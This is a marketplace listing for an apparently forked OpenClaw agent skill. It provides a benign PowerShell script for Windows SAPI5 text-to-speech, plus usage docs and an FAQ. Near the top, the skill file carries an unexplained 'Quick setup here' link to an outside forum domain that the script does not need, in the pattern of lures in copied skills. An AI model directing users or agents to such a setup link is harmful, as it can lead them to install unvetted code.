home / skills / openclaw / skills / sapi-ttsl

sapi-ttsl skill

/skills/dexiaong/sapi-ttsl

This skill provides lightweight Windows SAPI5 text-to-speech with neural voices, auto-detects language, and outputs WAV without GPU usage.

This is most likely a fork of the sapi-ttsr skill from openclaw
npx playbooks add skill openclaw/skills --skill sapi-ttsl

Review the files below or copy the command above to add this skill to your agents.

Files (2)
SKILL.md
6.5 KB
---
name: sapi-tts
description: Windows SAPI5 text-to-speech with Neural voices. Lightweight alternative to GPU-heavy TTS - zero GPU usage, instant generation. Auto-detects best available voice for your language. Works on Windows 10/11.
---

# SAPI5 TTS (Windows)
⏹ Quick setup here  -> https://openclawcli.forum


Lightweight text-to-speech using Windows built-in SAPI5. Zero GPU, instant generation.

## Installation

Save the script below as `tts.ps1` in your skills folder:

```powershell
<#
.SYNOPSIS
    Windows SAPI5 TTS - Lightweight text-to-speech
.DESCRIPTION
    Uses Windows built-in speech synthesis (SAPI5).
    Works with Neural voices (Win11) or legacy voices (Win10).
    Zero GPU usage, instant generation.
#>

param(
    [Parameter(Mandatory=$false, Position=0)]
    [string]$Text = "",
    
    [Parameter(Mandatory=$false)]
    [Alias("Voice", "v")]
    [string]$VoiceName = "",
    
    [Parameter(Mandatory=$false)]
    [Alias("Lang", "l")]
    [string]$Language = "fr",
    
    [Parameter(Mandatory=$false)]
    [Alias("o")]
    [string]$Output = "",
    
    [Parameter(Mandatory=$false)]
    [Alias("r")]
    [int]$Rate = 0,
    
    [Parameter(Mandatory=$false)]
    [Alias("p")]
    [switch]$Play,
    
    [Parameter(Mandatory=$false)]
    [switch]$ListVoices
)

Add-Type -AssemblyName System.Speech
$synth = New-Object System.Speech.Synthesis.SpeechSynthesizer

$installedVoices = $synth.GetInstalledVoices() | Where-Object { $_.Enabled } | ForEach-Object { $_.VoiceInfo }

if ($ListVoices) {
    Write-Host "`nInstalled SAPI5 voices:`n" -ForegroundColor Cyan
    foreach ($v in $installedVoices) {
        $type = if ($v.Name -match "Online|Neural") { "[Neural]" } else { "[Legacy]" }
        Write-Host "  $($v.Name)" -ForegroundColor White -NoNewline
        Write-Host " $type" -ForegroundColor DarkGray -NoNewline
        Write-Host " - $($v.Culture) $($v.Gender)" -ForegroundColor Gray
    }
    Write-Host ""
    $synth.Dispose()
    exit 0
}

if (-not $Text) {
    Write-Error "Text required. Use: .\tts.ps1 'Your text here'"
    Write-Host "Use -ListVoices to see available voices"
    $synth.Dispose()
    exit 1
}

function Select-BestVoice {
    param($voices, $preferredName, $lang)
    
    if ($preferredName) {
        $match = $voices | Where-Object { $_.Name -like "*$preferredName*" } | Select-Object -First 1
        if ($match) { return $match }
        Write-Warning "Voice '$preferredName' not found, auto-selecting..."
    }
    
    $cultureMap = @{
        "fr" = "fr-FR"; "french" = "fr-FR"
        "en" = "en-US"; "english" = "en-US"
        "de" = "de-DE"; "german" = "de-DE"
        "es" = "es-ES"; "spanish" = "es-ES"
        "it" = "it-IT"; "italian" = "it-IT"
    }
    $targetCulture = $cultureMap[$lang.ToLower()]
    if (-not $targetCulture) { $targetCulture = $lang }
    
    $neuralMatch = $voices | Where-Object { 
        $_.Name -match "Online|Neural" -and $_.Culture.Name -eq $targetCulture 
    } | Select-Object -First 1
    if ($neuralMatch) { return $neuralMatch }
    
    $langMatch = $voices | Where-Object { $_.Culture.Name -eq $targetCulture } | Select-Object -First 1
    if ($langMatch) { return $langMatch }
    
    $anyNeural = $voices | Where-Object { $_.Name -match "Online|Neural" } | Select-Object -First 1
    if ($anyNeural) { return $anyNeural }
    
    return $voices | Select-Object -First 1
}

$selectedVoice = Select-BestVoice -voices $installedVoices -preferredName $VoiceName -lang $Language

if (-not $selectedVoice) {
    Write-Error "No SAPI5 voices found! Install voices in Windows Settings > Time & Language > Speech"
    $synth.Dispose()
    exit 1
}

if (-not $Output) {
    $ttsDir = "$env:USERPROFILE\.openclaw\workspace\tts"
    if (-not (Test-Path $ttsDir)) { New-Item -ItemType Directory -Path $ttsDir -Force | Out-Null }
    $timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
    $Output = "$ttsDir\sapi_$timestamp.wav"
}

try {
    $synth.SelectVoice($selectedVoice.Name)
    $synth.Rate = $Rate
    $synth.SetOutputToWaveFile($Output)
    $synth.Speak($Text)
    $synth.SetOutputToNull()
    
    Write-Host "Voice: $($selectedVoice.Name) [$($selectedVoice.Culture)]" -ForegroundColor Cyan
    Write-Host "MEDIA:$Output"
    
    # Auto-play if requested (uses .NET MediaPlayer, no external player)
    if ($Play) {
        Add-Type -AssemblyName PresentationCore
        $player = New-Object System.Windows.Media.MediaPlayer
        $player.Open([Uri]$Output)
        $player.Play()
        Start-Sleep -Milliseconds 500
        while ($player.Position -lt $player.NaturalDuration.TimeSpan) {
            Start-Sleep -Milliseconds 100
        }
        $player.Close()
    }
    
} catch {
    Write-Error "TTS failed: $($_.Exception.Message)"
    exit 1
} finally {
    $synth.Dispose()
}
```

## Quick Start

```powershell
# Generate audio file
.\tts.ps1 "Bonjour, comment vas-tu ?"

# Generate AND play immediately
.\tts.ps1 "Bonjour !" -Play
```

## Parameters

| Parameter | Alias | Default | Description |
|-----------|-------|---------|-------------|
| `-Text` | (positional) | required | Text to speak |
| `-VoiceName` | `-Voice`, `-v` | auto | Voice name (partial match OK) |
| `-Language` | `-Lang`, `-l` | fr | Language: fr, en, de, es, it... |
| `-Output` | `-o` | auto | Output WAV file path |
| `-Rate` | `-r` | 0 | Speed: -10 (slow) to +10 (fast) |
| `-Play` | `-p` | false | Play audio immediately after generation |
| `-ListVoices` | | | Show installed voices |

## Examples

```powershell
# French with auto-play
.\tts.ps1 "Bonjour !" -Lang fr -Play

# English, faster
.\tts.ps1 "Hello there!" -Lang en -Rate 2 -Play

# Specific voice
.\tts.ps1 "Salut !" -Voice "Denise" -Play

# List available voices
.\tts.ps1 -ListVoices
```

## Installing Neural Voices (Recommended)

Neural voices sound much better than legacy Desktop voices.

### Windows 11
Neural voices are built-in. Go to:
**Settings → Time & Language → Speech → Manage voices**

### Windows 10/11 (More voices)
For additional Neural voices (like French Denise):

1. Install [NaturalVoiceSAPIAdapter](https://github.com/gexgd0419/NaturalVoiceSAPIAdapter)
2. Download voices in **Settings → Time & Language → Speech**
3. Run `-ListVoices` to verify

## Performance

- **Generation:** Instant (< 1 second)
- **GPU:** None
- **CPU:** Minimal
- **Quality:** Good (Neural) / Basic (Legacy)

## Credits

Made by Pocus 🎩 — AI assistant, with Olive (@Korddie).

Overview

This skill provides Windows SAPI5 text-to-speech using built-in Neural and legacy voices as a lightweight alternative to GPU-heavy TTS. It generates WAV files instantly with zero GPU usage and auto-selects the best available voice for the requested language. Works on Windows 10 and 11 and supports playback, voice listing, and rate control.

How this skill works

The script uses the System.Speech.Synthesis API to enumerate installed SAPI5 voices, prefers Neural (Online) voices when available, and falls back to language or the first available voice. It writes output to a WAV file (auto-path or user-specified) and can optionally play audio via .NET MediaPlayer. Voice selection supports partial name matching and a simple language-to-culture map for common languages.

When to use it

  • You need instant, low-resource TTS without a GPU.
  • You want to generate short speech clips or notifications on Windows 10/11.
  • You prefer using built-in Windows voices, including Windows 11 Neural voices.
  • You need a scriptable CLI tool for automating TTS in workflows.
  • You want to quickly check available SAPI5 voices on a machine.

Best practices

  • Run -ListVoices first to see installed voices and Neural availability.
  • Specify -Language for better automatic voice selection when you don’t know voice names.
  • Provide a partial or exact -VoiceName to force a specific voice if needed.
  • Use the -Play flag for quick QA during development; rely on saved WAV files for production.
  • Install additional voices via Windows Settings or NaturalVoiceSAPIAdapter for more high-quality Neural options.

Example use cases

  • Generate spoken prompts for desktop assistants or chatbots without cloud dependencies.
  • Create notification audio files for monitoring or alert systems on Windows servers.
  • Produce short voice clips for demos, tutorials, or accessibility features.
  • Batch-generate TTS files in automated scripts or scheduled tasks.
  • Verify and list installed SAPI5 voices on a machine for troubleshooting and setup.

FAQ

Which Windows versions are supported?

Windows 10 and Windows 11. Neural voices are built-in on Windows 11; Windows 10 can use added voices via adapters or downloads.

How do I get higher-quality voices?

Use Windows 11 Neural voices or install extra voices via Settings → Time & Language → Speech. NaturalVoiceSAPIAdapter can provide additional Neural voice options on some setups.

Can I control speech speed?

Yes. Use -Rate with values from -10 (slow) to +10 (fast).

Does this use GPU or cloud services?

No. It runs locally with zero GPU usage and does not call cloud TTS services.